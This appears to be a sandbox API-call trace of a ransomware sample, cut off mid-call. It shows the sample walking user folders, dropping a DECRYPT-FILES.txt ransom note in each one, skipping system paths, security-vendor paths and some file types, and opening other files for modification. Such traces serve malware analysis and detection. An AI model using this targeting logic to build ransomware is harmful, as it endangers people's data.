StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\All Users") returned 0x0 [0077.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="AhnLab") returned 0x0 [0077.323] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.323] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned 105 [0077.323] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.323] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\\\jkbimi8.tmp") returned 117 [0077.323] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x460 [0077.324] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned 105 [0077.324] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.324] wsprintfW (in: param_1=0x3f2da48, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\\\DECRYPT-FILES.txt") returned 123 [0077.324] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x464 [0077.325] WriteFile (in: hFile=0x464, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2da44, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2da44*=0x23fc, lpOverlapped=0x0) returned 1 [0077.326] CloseHandle (hObject=0x464) returned 1 [0077.327] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned 105 [0077.327] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*" [0077.327] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\*", lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d98 [0077.327] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.327] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.327] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.327] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.327] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4a4a40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4caba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.327] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.327] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4a4a40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa4a4a40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4a4a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.327] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.327] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.327] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.327] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.327] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.327] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.327] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.327] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.327] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.327] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.327] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.327] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.327] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.327] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.327] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.327] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned 105 [0077.327] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.327] lstrcpyW (in: lpString1=0x3f2da38, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\" [0077.327] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\jkbimi8.tmp" [0077.328] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.328] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.328] CloseHandle (hObject=0x0) returned 0 [0077.328] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.328] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sys", cAlternateFileName="")) returned 1 [0077.328] lstrcmpW (lpString1="sys", lpString2=".") returned 1 [0077.328] lstrcmpW (lpString1="sys", lpString2="..") returned 1 [0077.328] lstrcatW (in: lpString1="sys", lpString2="\\" | out: lpString1="sys\\") returned="sys\\" [0077.328] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\", lpString2="sys\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\" [0077.328] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\Program Files") returned 0x0 [0077.328] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch=":\\Windows") returned 0x0 [0077.328] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\Games\\") returned 0x0 [0077.328] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.328] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.328] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.328] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.329] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.329] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\All Users") returned 0x0 [0077.329] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.329] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.329] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.329] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="AhnLab") returned 0x0 [0077.329] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.329] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned 109 [0077.329] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.329] wsprintfW (in: param_1=0x3f2d7cc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\\\jkbimi8.tmp") returned 121 [0077.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x468 [0077.330] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned 109 [0077.330] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.330] wsprintfW (in: param_1=0x3f2d7cc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\\\DECRYPT-FILES.txt") returned 127 [0077.330] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0077.330] WriteFile (in: hFile=0x46c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2d7c8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2d7c8*=0x23fc, lpOverlapped=0x0) returned 1 [0077.331] CloseHandle (hObject=0x46c) returned 1 [0077.331] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned 109 [0077.331] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*" [0077.331] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4caba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4caba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8dd8 [0077.331] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.331] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0xaa4caba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4caba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.332] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.332] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.332] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4caba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa4caba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4caba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.332] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.332] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa4caba0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa4caba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa4caba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.332] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.332] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.332] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.332] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.332] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.332] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.332] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.332] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.332] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.332] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.332] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.332] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.332] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.332] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.332] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.332] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned 109 [0077.332] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.332] lstrcpyW (in: lpString1=0x3f2d7bc, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\" [0077.332] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\jkbimi8.tmp" [0077.332] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.332] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.333] CloseHandle (hObject=0x0) returned 0 [0077.333] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.333] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d9d7640, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x1d4582b0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1d4582b0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 1 [0077.333] lstrcmpiW (lpString1="settings.sol", lpString2="DECRYPT-FILES.txt") returned 1 [0077.333] lstrcmpiW (lpString1="settings.sol", lpString2="autorun.inf") returned 1 [0077.333] lstrcmpiW (lpString1="settings.sol", lpString2="boot.ini") returned 1 [0077.333] lstrcmpiW (lpString1="settings.sol", lpString2="desktop.ini") returned 1 [0077.333] lstrcmpiW (lpString1="settings.sol", lpString2="ntuser.dat") returned 1 [0077.333] lstrcmpiW (lpString1="settings.sol", lpString2="iconcache.db") returned 1 [0077.333] lstrcmpiW (lpString1="settings.sol", lpString2="bootsect.bak") returned 1 [0077.333] lstrcmpiW (lpString1="settings.sol", lpString2="ntuser.dat.log") returned 1 [0077.333] lstrcmpiW (lpString1="settings.sol", lpString2="thumbs.db") returned -1 [0077.333] lstrcmpiW (lpString1="settings.sol", lpString2="Bootfont.bin") returned 1 [0077.333] lstrlenW (lpString="settings.sol") returned 12 [0077.333] lstrcmpiW (lpString1="sol", lpString2="lnk") returned 1 [0077.333] lstrcmpiW (lpString1="sol", lpString2="exe") returned 1 [0077.333] lstrcmpiW (lpString1="sol", lpString2="sys") returned -1 [0077.333] lstrcmpiW (lpString1="sol", lpString2="dll") returned 1 [0077.333] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned 109 [0077.333] lstrlenW (lpString="settings.sol") returned 12 [0077.333] lstrcpyW (in: lpString1=0x3f2d7bc, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\" [0077.333] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2="settings.sol" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" [0077.333] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.334] CreateFileW 